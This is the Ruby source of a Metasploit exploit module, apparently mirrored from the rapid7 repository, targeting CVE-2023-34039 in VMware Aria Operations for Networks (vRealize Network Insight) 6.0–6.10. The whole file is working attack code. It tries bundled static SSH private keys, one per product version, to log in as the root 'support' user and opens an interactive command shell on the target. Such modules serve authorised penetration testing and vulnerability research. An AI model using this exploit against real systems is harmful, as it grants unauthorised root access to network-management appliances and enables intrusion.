Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb
32286 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'net/ssh'

7
require 'net/ssh/command_stream'

8


9
class MetasploitModule < Msf::Exploit::Remote

10
  include Msf::Auxiliary::Report

11
  include Msf::Exploit::Remote::SSH

12


13
  Rank = ExcellentRanking

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        {

20
          'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure',

21
          'Description' => %q{

22
            VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0

23
            do not randomize the SSH keys on virtual machine initialization. Since the key is easily

24
            retrievable, an attacker can use it to gain unauthorized remote access as the "support" (root) user.

25
          },

26
          'Platform' => 'unix',

27
          'Arch' => ARCH_CMD,

28
          'Privileged' => true,

29
          'Targets' => [

30
            [ '6.0_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_platform') } ],

31
            [ '6.0_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_proxy') } ],

32
            [ '6.1_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_platform') } ],

33
            [ '6.1_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_proxy') } ],

34
            [ '6.2_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_collector') } ],

35
            [ '6.2_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_platform') } ],

36
            [ '6.3_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_collector') } ],

37
            [ '6.3_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_platform') } ],

38
            [ '6.4_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_collector') } ],

39
            [ '6.4_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_platform') } ],

40
            [ '6.5_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_collector') } ],

41
            [ '6.5_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_platform') } ],

42
            [ '6.6_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_collector') } ],

43
            [ '6.6_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_platform') } ],

44
            [ '6.7_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_collector') } ],

45
            [ '6.7_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_platform') } ],

46
            [ '6.8_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_collector') } ],

47
            [ '6.8_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_platform') } ],

48
            [ '6.9_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_collector') } ],

49
            [ '6.9_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_platform') } ],

50
            [ '6.10_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_collector') } ],

51
            [ '6.10_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_platform') } ],

52
            [

53
              'All', {} # built later

54
            ],

55
          ],

56
          'Payload' => {

57
            'Compat' => {

58
              'PayloadType' => 'cmd_interact',

59
              'ConnectionType' => 'find'

60
            }

61
          },

62
          'Author' => [

63
            'h00die', # MSF module

64
            'SinSinology', # PoC

65
            'Harsh Jaiswal (@rootxharsh)', # Discovery

66
            'Rahul Maini (@iamnoooob)' # Discovery

67
          ],

68
          'License' => MSF_LICENSE,

69
          'References' => [

70
            ['CVE', '2023-34039'],

71
            ['URL', 'https://github.com/sinsinology/CVE-2023-34039'],

72
            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],

73
            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],

74
            ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH],

75
          ],

76
          'DisclosureDate' => '2023-08-29',

77
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

78
          'DefaultTarget' => 22,

79
          'Notes' => {

80
            'Stability' => [CRASH_SAFE],

81
            'Reliability' => [REPEATABLE_SESSION],

82
            'SideEffects' => [IOC_IN_LOGS]

83
          }

84
        }

85
      )

86
    )

87


88
    register_options(

89
      [

90
        # Since we don't include Tcp, we have to register this manually

91
        Opt::RHOST(),

92
        Opt::RPORT(22)

93
      ], self.class

94
    )

95


96
    register_advanced_options(

97
      [

98
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

99
        OptBool.new('STOP_ON_SUCCESS', [ false, 'Stop on successful login', true]),

100
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time in seconds to negotiate a SSH session', 30])

101
      ]

102
    )

103
  end

104


105
  # helper methods that normally come from Tcp

106
  def rhost

107
    datastore['RHOST']

108
  end

109


110
  def rport

111
    datastore['RPORT']

112
  end

113


114
  def do_login(user, key_data)

115
    opt_hash = ssh_client_defaults.merge({

116
      auth_methods: ['publickey'],

117
      port: rport,

118
      key_data: [ key_data ]

119
    })

120
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']

121
    begin

122
      ssh_socket = nil

123
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

124
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)

125
      end

126
    rescue Rex::ConnectionError

127
      print_error "#{rhost}:#{rport} SSH - Unable to connect"

128
      return nil

129
    rescue Net::SSH::Disconnect, ::EOFError

130
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

131
      return nil

132
    rescue ::Timeout::Error

133
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"

134
      return nil

135
    rescue Net::SSH::AuthenticationFailed

136
      print_error "#{rhost}:#{rport} SSH - Failed authentication"

137
      return nil

138
    rescue Net::SSH::Exception => e

139
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"

140
      return nil

141
    end

142


143
    if ssh_socket

144
      # Create a new session from the socket, then close it.

145
      conn = Net::SSH::CommandStream.new(ssh_socket, logger: self)

146
      ssh_socket = nil

147


148
      return conn

149
    end

150
    nil

151
  end

152


153
  def exploit

154
    if target.name == 'All'

155
      keys = targets.filter_map { |t| t.opts['key'] if t.name != 'All' }

156
    else

157
      keys = [target.opts['key']]

158
    end

159


160
    keys.each do |key|

161
      vprint_status("Attempting key: #{key}")

162
      key_data = File.read(key, mode: 'rb')

163
      conn = do_login('support', key_data)

164
      next unless conn

165


166
      print_good "#{rhost}:#{rport} - Successful login via support@#{rhost}:#{rport} and ssh key: #{key}"

167
      handler(conn.lsock)

168
      break if datastore['STOP_ON_SUCCESS']

169
    end

170
  end

171
end

172


173